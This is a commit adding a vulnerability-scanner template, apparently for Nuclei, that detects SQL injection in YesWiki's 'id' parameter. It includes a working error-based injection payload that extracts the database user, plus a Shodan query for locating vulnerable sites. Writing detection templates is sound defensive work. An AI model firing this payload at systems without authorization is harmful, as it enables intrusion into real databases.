Merge pull request #5055 from arafatansari/patch-48

Create yeswiki-sql.yaml

vulnerabilities/other/yeswiki-sql.yaml

@@ -0,0 +1,33 @@
+id: yeswiki-sql
+
+info:
+  name: YesWiki - SQL Injection
+  author: arafatansari
+  severity: critical
+  description: |
+    YesWiki before 2022-07-07 allows SQL Injection via the "id" parameter in the AccueiL URL.
+  reference:
+    - https://huntr.dev/bounties/32e27955-376a-48fe-9984-87dd77e24985/
+  metadata:
+    verified: true
+    shodan-query: http.html:"yeswiki"
+  tags: yeswiki,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5({{num}}),1,user()))))--+-'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'c8c605999f3d8352d7bb792cf3f'
+
+      - type: status
+        status:
+          - 200